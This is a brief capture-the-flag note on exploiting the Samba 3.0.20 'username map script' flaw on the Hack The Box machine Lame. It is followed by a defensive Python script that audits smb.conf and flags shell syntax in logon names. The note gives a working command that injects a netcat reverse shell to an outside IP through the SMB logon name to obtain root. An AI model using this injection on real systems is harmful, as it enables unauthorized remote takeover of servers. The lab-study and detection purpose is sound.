SMB Exploits

usermap_script.rb

Manual exploitation of Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) may be needed, as the HTB box Lame shows. Since the automated exploit does not work, log in anonymously, without an account, and run the following at the smb: \> prompt:

smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"

A connection to the root shell is provided.
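For the defensive side of the technique above, an added example (not part of the original page and not Samba's own code): it audits an smb.conf for the `username map script` option that the exploit title names, and flags logon names carrying shell syntax such as the backticks in the command shown. The sample configuration, the script path and the logon names are constructed for illustration.

```python
import re

# Shell syntax that has no place in an SMB account name. A bare "$" is left
# out because machine accounts end in "$", and "\" because of DOMAIN\user.
SHELL_META = re.compile(r"[`;|&<>\n]|\$[({]")

def suspicious_username(name):
    """True if a logon name carries command-substitution or chaining syntax."""
    return bool(SHELL_META.search(name))

def _norm(param):
    # smb.conf parameter names ignore case and embedded whitespace.
    return re.sub(r"\s+", "", param).lower()

def find_username_map_script(conf_text):
    """Return (section, value) pairs where 'username map script' is set."""
    hits, section = [], None
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":      # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, sep, value = line.partition("=")
        if sep and _norm(key) == "usernamemapscript" and value.strip():
            hits.append((section, value.strip()))
    return hits

# Constructed sample inputs (not taken from a real host).
SAMPLE_CONF = """
[global]
   workgroup = WORKGROUP
   ; username map script = /bin/false
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""
SAMPLE_LOGONS = ["alice", "WORKGROUP\\bob", "LAME$", "./=`id`"]

if __name__ == "__main__":
    for section, value in find_username_map_script(SAMPLE_CONF):
        print(f"[{section}] username map script = {value}")
    for name in SAMPLE_LOGONS:
        if suspicious_username(name):
            print("suspicious logon name:", repr(name))
```

A hit from `find_username_map_script` on a host running a Samba version in the range given above is the condition to remove or patch; the username check is a heuristic for log or packet review, not a substitute for upgrading.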